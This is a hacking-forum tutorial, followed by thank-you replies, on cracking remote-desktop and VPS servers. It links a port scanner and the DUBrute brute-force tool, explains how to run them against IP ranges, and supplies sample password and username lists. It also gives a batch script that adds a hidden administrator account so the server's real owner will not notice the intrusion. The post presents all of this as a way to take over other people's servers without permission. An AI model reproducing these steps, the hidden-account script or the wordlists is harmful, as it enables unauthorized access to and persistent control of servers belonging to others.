Sign in to follow this  
ForlaxPy

HQ Tutorial About Cracking RDP/VPS with details

I just came across that subject to find out that there is no tutorials here on cracked so I decided to take everything I learned and put it here in a compact tutorial.

[hide]

Note: It took me arround an hour to write the whole tutorial I took a lot of knowledge from some other external sources then I combined everything for you here so please if you could at least drop a Like that would be awesome thnx in advance !

So first of all a VPS is a virtual machine sold as a service by an Internet hosting service. A VPS runs its own copy of an operating system (OS), and customers may have superuser-level access to that operating system instance, so they can install almost any software that runs on that OS.

They got ton of uses as they have a fast internet and traffic and they keep themselves online so you could put a 1M combo then start cracking on it then you will check the result tomorrow morning yeah it's insane the VPS are stronger, faster, and more acceptable that home PC!

Now let's get into cracking them first of all I would like to say that there is alot of tools that does this job but I'm just gonna provide the most know 2 that does the job very well:

✔️KPORT SCANNER DL: https://mega.nz/#!kZVARACa!ol8OoL_0TiBGR3BGLnTUP1nqqEkE05CBoIapr7GAwMs

VirusTotal: https://www.virustotal.com/#/file/5c52fe8908c26386da3f04b15deb927a144bc7d0b5f6b8d941a56a9821004d8a/detection

✔️DUBrute                  DL: https://mega.nz/#!0V0iFazS!kp5ph7xsgHKYTDmVSOfGI883RJa90E9h2U-OdjtLafg

VirusTotal: https://www.virustotal.com/#/file/3039a079d70d6491e8b795841a857d7f274be6e6e998a2d64cd04e4dd408126a/detection

✔️IP ADDRESSES For specific country: https://www.countryipblocks.net/country_selection.php

For specific datacenter: https://myip.ms/

STEPS:

1] Download DUBrute & KPORT SCANNER from above links and install them

2] Grab the IP addresses list and copy paste them in kport scanner. After clicking start button don't change anything

3] AFTER u find some ips in count of goods..good ips automaticaly saved in results section..

4] Now open DUBrute 

️ Click on “Generation”.Then another window will open. 

️ Now this step is pretty self explanatory, You must load each of the .txt file in its respective field. 

️ For IP click on “File IP” and browse to the results.txt file you saved in kport scan folder.

For Login click on “File Login” and browse to the DUBrute Folder. 

️ You’ll find a .txt file named “Login”. Select that file. For Password click on “File Pass” and again browse to the DUBrute Folder. 

️ You’ll find a .txt file named “Pass”. That is the file you need.

5] When you get some “Good” Ip’s, it’s time to connect to the VPS/RDP.The working IP’s are stored in a .txt file named “Good” in the DUBrute folder.

They are in the format “111.222.333.444@username;password. 

NOW ONCE YOU GET SOME HITS TRY TO FOLLOW THESE INSTRUCTIONS

1- Connect to VPS with Remote Desktop Connection

2- Going to! WebBrowser and go to History! if you find anything it means that someone uses this VPS! and you need to make a hidden user! so The builder will not notice your presence!

3- write this commands on a notepad and save it as the .bat file! so when you open this bat file this make a hidden user on your VPS!

cd\
cls
REM "vps hide use creator"
REM ------------------------------
@echo off
set /p user=PLS INSERT YOUR USERNAME:
set /p pass=PLS INSERT YOUR PASSWORD:
net user /add %user% %pass%
net localgroup administrators /add %user%
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v %user% /t REG_DWORD /d 0
pause

4- go to task manager and performance and look at uptime! if it was low, you don't need to be a worry! no one uses this VPS before you!

Some Tips and Trick:

- don't try to scan IP on famous Datacenter like Hetzener, 1&1, Amazon ETC ...

- remember! you need to be patient and you need Creativity skills to make password lists!

- first, before crack on cracked VPS, check if someone uses that or not! 

- try hard passwords! but not too hard!

- if you are a beginner in VPS cracking don't try crack on big datacenters! do it with smaller

- china and Asian countries use public passwords! you can get hits Easy

Bonus Informations!

[align=center]HOW TO WRITE A HQ PASSWORD LIST?!

this is an important part! you need a powerful password list to crack VPS!

you must make the password list by your own! and it's linked to your creativity! and of course experience

for making that you need to pay attention and be patient! cause it takes time!

we have many types of password list! like name, location, car name, random numbers, and more!

for example! you want to crack Germany datacenters! you should make a password list by using their famous place's names and more! or, you can use public passwords like admin, password123, numbers and more ...

admin123
admin@123
admin#123
~admin_123
admin_2018
admin_2017
admin__!@#
!admin!

//and more ... 

Berlin123
Berlin@123
Berlin#123
~Berlin12$
Berlin100%
Berlin_12#

//for Russians use their language for password and also users! 

администратор : administrator
админ : admin
гость : guest

Москва@123
Москва%25
Москва$123
Москва~`1
Москва@2018
@2018Москва

HOW TO WRITE A USERNAME LIST?![/align]

[align=center]most datacenters use public users for their VPS

the most used users:

Admin
administrator (could be diff with the other countries lang)
user
gues

[/align]

But that doesnt meant that you cannot use some custom users :smart: :smart:

F.A.Q

IS IT EASY TO GET A LOT OF HITS?

Of course it's not easy! Just try to be creative on the user;pass and try your luck

IF THEY FOUND THAT IM USE THEIR VPS, THEN WHAT HAPPENED?

Knock knock :pepegun:

WARNING:

These tools may contains malwares/viruses so run them on a VM OR SANDBOXIE

Enjoy!

[/hide]

Cheers bro

thx broo soo much

Thanks for the effort made.. Thumbs up

Ohh Cool Friend, thanks for sharing the post, exellent job

its frustrting if u leech u will get banned ma man

its frustrting if u leech u will get banned ma man

Is it using sentry mba?

I just came across that subject to find out that there is no tutorials here on cracked so I decided to take everything I learned and put it here in a compact tutorial.

best bro in cracked.to

Loooolffggyy

RDP its the must thing for cracking

Upvoted

Thank you for your contribution

Thanks for the effort made.. liked

Let me check

really appricated thank you so much!!1